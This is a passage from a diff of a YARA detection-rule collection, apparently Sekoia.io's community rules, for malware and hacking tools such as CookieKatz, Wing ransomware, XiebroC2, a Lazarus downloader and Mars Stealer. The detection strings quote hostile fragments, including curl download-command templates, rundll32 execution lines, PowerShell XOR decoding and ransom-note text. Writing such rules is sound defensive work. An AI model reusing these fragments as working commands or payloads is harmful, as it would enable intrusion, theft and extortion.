+		logic_hash = "5a3ee8c2c3c377bea7de1993e5ef744796130643575bcce1b6181d68190aafb7"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$first_payload = "jBGIcSr2fKhj1ZT2YNLBTcYYeAw/vWUT98dCA/H6hpI+dY+lkoSe1ATx7XEIXKtAdTSwl1PKhNROoxstXsnsHTZbS2ikRLv6lmHd5v09DltsPeXIOA789wZC8qR1OScJFohGxuWQSQ8K2TAFUQAntIFdX+Om1QZUARdDnb4f+P8VFucU9avWD75yK1IcTDDDEYwvm/rwUYTqWitcrfIY+aFcgQwyvEzkN7Pbsah4Kts+XmK0C3TzlnDd2mz6TdsPphGbBxcbBdZGMTyzunZUEKRYea7xM6u+az9v7m6a1G6vhsSqz4C/nleDmzL2dIVnVR6Ni6+0hlExcP" wide
-		$rijndael_key1 = { e5 a0 b1 e8 89 be e8 8e 8e e4 bb a3 e5 ba b5 e9 85 8d e7 89 b9 e6 b0 8f e5 85 8b e9 9b 99 e8 89 be e5 8b 92 e6 8b 89 e6 a1 83 e9 ad 9a e6 88 91 e6 96 af e6 a1 83 e5 ba 95 e5 be b7 }
-		$rijndael_key2 = { e7 9b 9f e7 91 aa e6 a1 83 e9 87 91 e5 90 89 e9 97 95 e5 a0 b1 e9 9b 99 e9 97 95 e5 96 ac e5 ba 95 e5 a0 b1 e5 be b7 e6 8b 89 e5 92 8c e7 a0 b4 e7 88 be e9 a6 ac e6 88 91 e5 8a a0 }
-		$rijndael_key3 = { e6 9b b2 e6 b0 8f e5 ba b5 e5 a3 ab e9 97 95 e5 be b7 e6 96 af e8 9b 8b }
-		$s1 = "fullofdick"
-		$s2 = "holdmeback"
-		$s3 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" wide
+		$a1 = "Content-Type: multipart/form-data; boundary=----%s" ascii
+		$a2 = "Content-Disposition: form-data; name=\"p\"" ascii
+		$a3 = "Content-Type: application/octet-stream"
+		$w1 = "%s||%s||%s||%s" wide
+		$w2 = "Pragma: no-cache" wide
+		$w3 = { 64 00 6F 00 63 00 00 00 00 00 2E 00 64 00 6F 00 63 00 78 00 }
 
 	condition:
-		($first_payload and all of ( $rijndael_key* ) ) or 2 of ( $s* )
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 2 of ( $a* ) and 2 of ( $w* )
 }
-rule SEKOIA_Vpn_Mul_Softether
+rule SEKOIA_Hacktool_Win_Cookiekatz : FILE
 {
 	meta:
-		description = "Detect the open-source SoftEther VPN"
+		description = "Finds ChromeKatz (CookieKatz version) standalone samples based on the strings"
 		author = "Sekoia.io"
-		id = "a1fbf4fe-b934-4a66-b6b1-ebe2f83505cd"
-		date = "2024-04-15"
+		id = "a32769bb-4ec4-46c7-9402-21afdf8d4293"
+		date = "2024-10-30"
 		modified = "2024-12-19"
-		reference = "https://www.softether.org/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/vpn_mul_softether.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f93e838631518590e518f29557c60a40734da30b62c056f8ebb8febed389551b"
+		reference = "https://github.com/Meckazin/ChromeKatz"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_win_cookiekatz.yar#L1-L36"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "fef9fc33a788489af44b2f732c450d4ef018fbaced7f5471230b282dfd6f1169"
+		logic_hash = "a030f551d0f3dedf0f19e22b415aa87dd1c43ab2242db8b5cad14ae6b7695b3a"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\softether_se%s"
-		$ = "GET /vgc_download_dat/ HTTP/1.1"
-		$ = "http://x%c.x%c.client.api.vpngate2.jp/api/"
-		$ = "http://x0.x0.client.api.vpngate2.jp/check/check.txt"
-		$ = "https://x%c.x%c.statistics.api.vpngate2.jp/api/statistics/"
-		$ = "Software\\SoftEther Project\\SoftEther VPN\\"
-		$ = "|vpnsetup_nosign.exe" wide
-		$ = "/ISEASYINSTALLER:%u" wide
-		$ = "/CALLERSFXPATH:\"%s\"" wide
-		$ = "vpn_client.config" wide
-		$ = "vpn_bridge.config" wide
-		$ = "|backup_dir_readme.txt" wide
-		$ = "vpn_debuginfo_%04u%02u%02u_%02u%02u%02u.zip" wide
+		$str01 = "CookieKatz.exe" ascii
+		$str02 = "--utility-sub-type=network.mojom.NetworkService" wide
+		$str03 = "chrome.dll" wide
+		$str04 = "msedge.dll" wide
+		$str05 = "msedgewebview2.exe" wide
+		$str06 = "Failed to read cookie struct" wide
+		$str07 = "Failed to read the root node from given address" wide
+		$str08 = "Error reading left node" wide
+		$str09 = "By Meckazin" ascii
+		$str10 = "By default targets first available Chrome process" ascii
+		$str11 = "Kittens love cookies too!" ascii
+		$str12 = "Attempting to read the cookie value from address: 0x%p" ascii
+		$str13 = "szCookieMonster" ascii
+		$str14 = "[*] Targeting Chrome" ascii
+		$str15 = "[*] Targeting Edge" ascii
+		$str16 = "[*] This Cookie map was empty" ascii
+		$str17 = "[+] Found browser process: %d" ascii wide
+		$str18 = "[*] Targeting process PID: %d" wide
+		$str19 = "[*] Found CookieMonster on 0x%p" wide
+		$str20 = "[*] CookieMap should be found in address 0x%p" wide
 
 	condition:
-		8 of them
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SEKOIA_Apt_Sidecopy_Malicious_Macro : FILE
+rule SEKOIA_Ransomware_Win_Wing : FILE
 {
 	meta:
-		description = "Detects malicious macro used by SideCopy"
+		description = "Finds Wing ransomware samples based on specific strings"
 		author = "Sekoia.io"
-		id = "4b90c33e-48d4-48b6-87a7-c35686e7e913"
-		date = "2023-05-11"
+		id = "c2fe8321-8013-4aa4-91a6-c0face3e6b52"
+		date = "2024-01-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sidecopy_malicious_macro.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b1d9d7af8507b478b2a8d34a4a5ca3714b219a42d5b3f9d5026d98351294e1cf"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_wing.yar#L1-L52"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c9f373c12f4fb5efc29d0f293a2e0b46cf03c1abe124e9dd4118bef6c6e3f731"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "htmlFile$"
-		$ = "Gecko/20100101 Firefox/91.0"
-		$ = "Start Menu\\Programs\\Startup\\"
-		$ = "Document_Close"
-		$ = "ThisDocument" wide
-		$ = "ServerXMLHTTP.6.0"
+		$fun01 = "LockBIT" ascii fullword
+		$fun02 = "BigEncrypt" ascii
+		$fun03 = "RunEncrypt" ascii
+		$fun04 = "AesEncrypt" ascii
+		$fun05 = "KeyGenerator" ascii
+		$fun06 = "GetUniqueKey" ascii
+		$fun07 = "SearchFolder" ascii
+		$fun08 = "ThreadFolders" ascii
+		$fun09 = "ContainsKeyword" ascii
+		$fun10 = "ReadMeMaker" ascii
+		$fun11 = "StopAndConfigureSqlServices" ascii
+		$fun12 = "WipeRecycleBin" ascii
+		$fun13 = "TelSender" ascii
+		$str01 = "AnyDesk" wide
+		$str02 = "firebird" wide
+		$str03 = "Acronis" wide
+		$str04 = "config \"" wide
+		$str05 = " start= demand" wide
+		$str06 = "' stopped and configured to start automatically." wide
+		$str07 = "Error processing service '" wide
+		$str08 = "$RECYCLE.BIN" wide
+		$str09 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$str10 = "UniqueID:" wide
+		$str11 = "PersonalID:" wide
+		$ran01 = "C:\\Readme.txt" wide
+		$ran02 = "C:\\LockBIT\\systemID" wide
+		$ran03 = "Your system has been encrypted by our team, and your files have been locked using our proprietary algorithm !" wide
+		$ran04 = "* Please read this message carefully and patiently *" wide
+		$ran05 = "* If you use any tools, programs, or methods to recover your files and they get damaged, we will not be responsible for any harm to your files !" wide
+		$ran06 = "* Note that your files have not been harmed in any way they have only been encrypted by our algorithm." wide
+		$ran07 = "Your files and your entire system will return to normal mode through the program we provide to you. No one but us will be able to decrypt your files !" wide
+		$ran08 = "* To gain trust in us, you can send us a maximum of 2 non-important files, and we will decrypt them for you free of charge." wide
+		$ran09 = "Please put your Unique ID as the title of the email or as the starting title of the conversation." wide
+		$ran10 = "* For faster decryption, first message us on Telegram. If there is no response within 24 hours, please email us *" wide
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and all of them
+		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $fun* ) and 5 of ( $str* ) and 2 of ( $ran* ) ) or 12 of ( $fun* ) or 10 of ( $ran* ) or 8 of ( $ran* ) )
 }
-rule SEKOIA_Guloader_Lnk_File : FILE
+rule SEKOIA_Recotool_Adfind_Strings : FILE
 {
 	meta:
-		description = "LNK file delivering Guloader"
+		description = "Detects Adfind utility based on strings"
 		author = "Sekoia.io"
-		id = "ecc07753-0910-445b-bf84-911b17195894"
-		date = "2024-02-07"
+		id = "afca88ef-756a-4b2b-91d7-d18d730e7074"
+		date = "2022-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/guloader_lnk_file.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d69038a8b26c7fc7ba7b0968c7c91b589b25512dcf7e3ad5ee56453a4654a1ab"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/recotool_adfind_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "cc1e1dceff28136082f19cebc7584ba08c9006b964e37fc3fda91bc0b41906dc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237463,198 +238345,194 @@ rule SEKOIA_Guloader_Lnk_File : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "$PSHOME" wide
-		$s2 = "&(${" wide
-		$s3 = "}::ToString(" wide
-		$s4 = "$([TYPE]${" wide
+		$ = "Find all person objects on cn=ab container of local ADAM instance"
+		$ = "IPv6 IP address w/ port is specified [address]:port"
+		$ = "Search Global Catalog (port 3268)."
+		$ = "~~~ADCSV~~~"
+		$ = "adfind -b dc="
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 5MB and 4 of them
 }
-
-rule SEKOIA_Backdoor_Win_Ketrum2
+rule SEKOIA_Apt_Coathanger_Files : FILE
 {
 	meta:
-		description = "Detect Ke3chang's Ketrum backdoor version 2"
+		description = "Detects COATHANGER files"
 		author = "Sekoia.io"
-		id = "afcc349a-d44b-4b66-b86f-c62e700fa899"
-		date = "2022-10-19"
+		id = "615f5ac1-14bc-4f5b-a02e-7b13cd179917"
+		date = "2024-02-07"
 		modified = "2024-12-19"
-		reference = "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_ketrum2.yar#L4-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5317b133337ad333c97bbfa6c9d62aea5fd81f3b570f1d6b1ac93ea82062ef61"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_coathanger_files.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5406d8a99e16f08f1ffca548ea1dd1e27e7707506e796e0fc263bcdbb681632d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "271384a078f2a2f58e14d7703febae8a28c6e2d7ddb00a3c8d3eead4ea87a0c0"
-		hash2 = "aa467945dd7b9b095e592fc96384bb385f2c95d00d5424e42bb6ab09827cb0ce"
-		hash3 = "aacaf0d4729dd6fda2e452be763d209f92d107ecf24d8a341947c545de9b7311"
-		hash4 = "ac5cb6e17f094068686225075251153e3eb21dc2d1ae744a97ab113cab034a36"
 
 	strings:
-		$ = "powershell.exe" wide
-		$ = "cmd.exe" wide
-		$ = "%s\\adult.sft" wide
-		$ = "%s\\Notice" wide
-		$ = "%s\\Message" wide
-		$ = "\\Microsoft\\Media Player" wide
-		$ = "Windows\\CurrentVersion\\Explorer\\Shell Folders" wide ascii
-		$ = "Windows\\CurrentVersion\\Internet Settings" wide ascii
+		$ = "/data2/"
+		$ = "/httpsd"
+		$ = "/preload.so"
+		$ = "/authd"
+		$ = "/tmp/packfile"
+		$ = "/smartctl"
+		$ = "/etc/ld.so.preload"
+		$ = "/newcli"
+		$ = "/bin/busybox"
 
 	condition:
-		all of them and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "49a60be4b95b6d30da355a0c124af82b35000bce8f24f957d1c09ead47544a1e" )
+		( uint32( 0 ) == 0x464c457f or uint32( 4 ) == 0x464c457f ) and filesize < 5MB and 4 of them
 }
-rule SEKOIA_Koi_Koiloader : FILE
+rule SEKOIA_Tool_Xiebroc2_Strings
 {
 	meta:
-		description = "Detects Koi Loader"
+		description = "Detects XiebroC2 based on strings"
 		author = "Sekoia.io"
-		id = "b8289d78-42de-4919-b2c5-3c926ddd8043"
-		date = "2024-03-20"
+		id = "8451878e-5371-440b-b8ac-f9e6f7643d3c"
+		date = "2024-09-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/koi_koiloader.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7b4f12b0dec3927a46db1c8b2163e54a0a515d2b7360ba94647097fecf3d4653"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_xiebroc2_strings.yar#L1-L40"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "84e665bcbf963a2cf67d879aa3422d79"
+		hash = "3558c376420724694ba244a2e2acd20c"
+		hash = "e29fb9cd825db51a7a2e519f188e61ba"
+		hash = "a3b31739ad5eed51277c8478a83160a3"
+		hash = "d6e2499ea7fe8f047da1a95dae16d2c3"
+		hash = "1616818b65bf49d985bb1816461a4a75"
+		hash = "2e72d3ef2492088a4623d77d5e419ab8"
+		hash = "351770f860507d652ec3644ed1988f7f"
+		hash = "58fa6ad96028753ba8b0b0ed8fa6dccb"
+		hash = "607b541525b27eeefbef1455397bff35"
+		hash = "c2a242612468814e2e951e4db3762059"
+		hash = "431e275f4e43ec4ef7c2cc8ba126e9d3"
+		hash = "ace54bd32c226a7b9a6d4d53791e4021"
+		hash = "f22c21ed7bba1ddfc42ffdc66da3a4dd"
+		hash = "9a5ff9e07ed04cb0e71102cf1aae380c"
+		hash = "d20e01a1af3f40a7a9646d7e7df1b42e"
+		hash = "5544b621c9772cd32c4db77a0e59515a"
+		logic_hash = "f3be31e0f1ad8e8bce132d861de5068340653547d786378f9b8045382f40939f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s2 = "%d|%s|%.16s|" ascii wide
-		$s3 = "Release" ascii wide
-		$s4 = "%s|%d.%d (%d)|%S|%S|%S" ascii wide
-		$s5 = "InitiateSystemShutdownExW" ascii wide
+		$s1 = "RemarkClientColor"
+		$s2 = "HandlePacket"
+		$s3 = "-hide"
+		$s4 = "Failed to send data:"
+		$s5 = "Pac_ket"
+		$s6 = "WANip"
+		$s7 = "%s %s && Kernel: %s"
+		$g1 = "go.buildid"
+		$g2 = "dep    golang.org"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 11MB and all of them
+		3 of ( $s* ) and any of ( $g* )
 }
-rule SEKOIA_Tool_Exploit_Rottenpotato_Strings : FILE
+rule SEKOIA_Koi_Powershell_Loading_Obfuscatednet
 {
 	meta:
-		description = "Detects RottenPotato compiled binaries"
+		description = "Powershell script loading obfuscated .NET Koi module"
 		author = "Sekoia.io"
-		id = "453646d4-b128-40ea-8840-4c53b8f1e486"
-		date = "2022-09-09"
+		id = "75a7460d-cc28-470e-9841-da8e46ee0101"
+		date = "2024-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_exploit_rottenpotato_strings.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c634fcced6889caf895ddf57bab5564fb2b0a4c83f1d6ba4dae655f2e5d935db"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/koi_powershell_loading_obfuscatednet.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "82f30c04474ea77af5169771a2c0e75ba792fd32dc559b8c29172b73ace4ef10"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "WSAStartup failed with error: %d"
-		$ = "getaddrinfo failed with error: %d"
-		$ = "RPC -> send failed with error: %d"
-		$ = "RPC-> Connection closed"
-		$ = "COM -> bytes sent: %d"
-		$ = "COM -> recv failed with error: %d"
-		$ = "Running %S with args %S"
-		$ = "[-] Failed to create proc: %d"
-		$ = "Waiting for auth..."
-		$ = "Auth result: %d"
-		$ = "SeImpersonatePrivilege" wide
+		$s1 = "# [Net.ServicePointManager]::SecurityProtocol +='tls12'"
+		$s2 = "$binary[$i] = $binary[$i] -bxor $k[$i % $k.Length]"
+		$s3 = "\").Split('|')"
+		$s4 = "$ep.Invoke($null, "
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 8 of them
+		$s3 and 3 of them
 }
-rule SEKOIA_Recotool_Adfind_Strings : FILE
+rule SEKOIA_Tool_Enum4Linux_Strings
 {
 	meta:
-		description = "Detects Adfind utility based on strings"
+		description = "Detects enum4linux based on strings"
 		author = "Sekoia.io"
-		id = "afca88ef-756a-4b2b-91d7-d18d730e7074"
-		date = "2022-02-08"
+		id = "6b3094fe-1292-4da3-a1ed-9e255be531da"
+		date = "2024-02-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/recotool_adfind_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "cc1e1dceff28136082f19cebc7584ba08c9006b964e37fc3fda91bc0b41906dc"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_enum4linux_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d3f7ddbdfb679b34777298aec84464d55fac7600b855526a7f13d8c8f17ab888"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Find all person objects on cn=ab container of local ADAM instance"
-		$ = "IPv6 IP address w/ port is specified [address]:port"
-		$ = "Search Global Catalog (port 3268)."
-		$ = "~~~ADCSV~~~"
-		$ = "adfind -b dc="
+		$ = "my $os_info = `$command`;"
+		$ = "($global_workgroup) = $os_info =~"
+		$ = "sub enum_groups {"
+		$ = "if ($shares =~ /NT_STATUS_ACCESS_DENIED/) {"
+		$ = "Can't open share list file $shares_file"
+		$ = "my $users = `$command`;"
+		$ = "my @shares = <SHARES>;"
+		$ = "foreach my $grouptype (\"builtin\", \"domain\") {"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 5MB and 4 of them
+		6 of them
 }
-rule SEKOIA_Rat_Win_Xworm_V2 : FILE
+rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Downloader : FILE
 {
 	meta:
-		description = "Finds XWorm v2 samples based on characteristic strings"
+		description = "Detects VHD ransomware downloader"
 		author = "Sekoia.io"
-		id = "6cf06f52-0337-415d-8f29-f63d67e228f8"
-		date = "2022-11-07"
+		id = "edcc9df8-650c-437a-adb8-a671e8b75e64"
+		date = "2022-11-28"
 		modified = "2024-12-19"
-		reference = "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_xworm_v2.yar#L1-L38"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "58a2dbfbd453855021942902a6d55d150eee3acba67a294da24448cfca4f811e"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_lazarus_vhd_ransomware_downloader.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "042ab0029d170937af9b9ee6a8e499843532c84cf99faed3d2d47cb18a1500ac"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "XWorm.exe" wide ascii
-		$str02 = "ngrok" wide ascii
-		$str03 = "Mutexx" ascii
-		$str04 = "FileManagerSplitFileManagerSplit" wide
-		$str05 = "InstallngC" wide
-		$str06 = "downloadedfile" wide
-		$str07 = "creatfile" wide
-		$str08 = "creatnewfolder" wide
-		$str09 = "showfolderfile" wide
-		$str10 = "hidefolderfile" wide
-		$str11 = "txtttt" wide
-		$str12 = "\\root\\SecurityCenter2" wide
-		$str13 = "[USB]" wide
-		$str14 = "[Drive]" wide
-		$str15 = "[Folder]" wide
-		$str16 = "HVNC" wide
-		$str17 = "http://exmple.com/Uploader.php" wide
-		$str18 = "XKlog.txt" wide
-		$str19 = "Select * from AntivirusProduct" wide
-		$str20 = "runnnnnn" wide
-		$str21 = "RunBotKiller" wide
-		$str22 = "bypss" wide
-		$str23 = "<Xwormmm>" wide
+		$ = "rundll32.exe %s #1 %S" wide
+		$ = "cmd /c timeout /t 10 & Del /f /q \"%s\" & attrib -s -h \"%s\" & rundll32 \"%s\" #1" wide
+		$ = "cmd /c timeout /t 10 & rundll32 \"%s\" #1" wide
+		$ = "curl -A cur1-agent -L %s -s -d da"
+		$ = "curl -A cur1-agent -L %s -s -d dl"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 12 of them
+		filesize < 2MB and 3 of them
 }
-rule SEKOIA_Trojan_Win_Bbtok_Lnk_Sep23 : FILE
+rule SEKOIA_Apt_Apt41_Keyplug_Dropper : FILE
 {
 	meta:
-		description = "Finds BBTok installation LNK file"
+		description = "Detects a dropper used by keyplug"
 		author = "Sekoia.io"
-		id = "b1d5dae6-d92f-4a4a-ae90-528cdb3e9e4c"
-		date = "2023-09-26"
+		id = "b6740371-c4c3-437e-8235-0bd4f7b9c3f5"
+		date = "2024-06-12"
 		modified = "2024-12-19"
-		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/trojan_win_bbtok_lnk_sep23.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "32bf07e3740399105359b62d8a612dfa731b024e06c9104b71b496919b5efe9e"
-		logic_hash = "5783487585dde1314c485bdcf3942b7e8b572c0689522ea136240833d2a64f5b"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt41_keyplug_dropper.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a61f57302d8fe58ed8b77542c94159acbc36a3bd52c204171e76e668d10a74e7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237662,27 +238540,26 @@ rule SEKOIA_Trojan_Win_Bbtok_Lnk_Sep23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$lnk = {4C 00 00 00}
-		$str01 = "%ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe" ascii wide
-		$str02 = ".pdf /Y & start" wide
-		$str03 = "\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -nologo" wide
+		$ = "C:\\ProgramData\\pfm.ico" wide
+		$ = "C:\\\\ProgramData\\\\pfm.ico" wide
+		$ = "67f8de349abc5ghi" wide
+		$ = "3abc64597f8diegh" wide
 
 	condition:
-		all of them and filesize < 10KB
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and any of them
 }
-rule SEKOIA_Tool_Inswor_Strings : FILE
+rule SEKOIA_Infostealer_Win_Mars_Stealer_Variant_Llcppc1 : FILE
 {
 	meta:
-		description = "Detects In-Swor based on strings"
+		description = "Detect Mars Stealer variand llcppc1"
 		author = "Sekoia.io"
-		id = "99aaad33-510a-41b9-9022-800588c18d6d"
-		date = "2024-09-09"
+		id = "3e2c7440b2fc9e4b039e6fa8152ac8fe"
+		date = "2022-03-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_inswor_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "c393128a143b2a3397100b4a30c75112"
-		logic_hash = "b25072e6a9fa5728c24c91056a221778f5fbc9d8ba7a78a6684cd6755761373e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_mars_stealer_variant_llcppc1.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f9d92338fa31c38648b72d7f9a953201c7e498237bc9d02d6247d1882d1e3432"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237690,25 +238567,24 @@ rule SEKOIA_Tool_Inswor_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "open encrypted file error:" ascii
-		$ = "open config file error:" ascii
-		$ = "payload.ini" ascii
+		$a = {ff 15 ?? ?? ?? ?? 89 45 ?? 6a 14 68 ?? ?? ?? ?? ff 75 ?? e8 23 00 00 00 ff 75 ?? ff 75 ?? ff 75 ?? e8 5c 00 00 00}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16( 0 ) == 0x5A4D and $a
 }
-rule SEKOIA_Apt_Gobrat_2 : FILE
+rule SEKOIA_Apt_Gamaredon_Gamaredon_Lnk_Usb_Spreader_Encoded : FILE
 {
 	meta:
-		description = "Detects GobRat related files"
+		description = "Detects encoded version of Gamaredon LNK USB Spreader"
 		author = "Sekoia.io"
-		id = "6b7e38f5-00bc-49c8-b34d-3e878bf426d8"
-		date = "2024-09-10"
+		id = "e42bb654-d1aa-4219-b3da-dd4053d59a83"
+		date = "2023-06-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
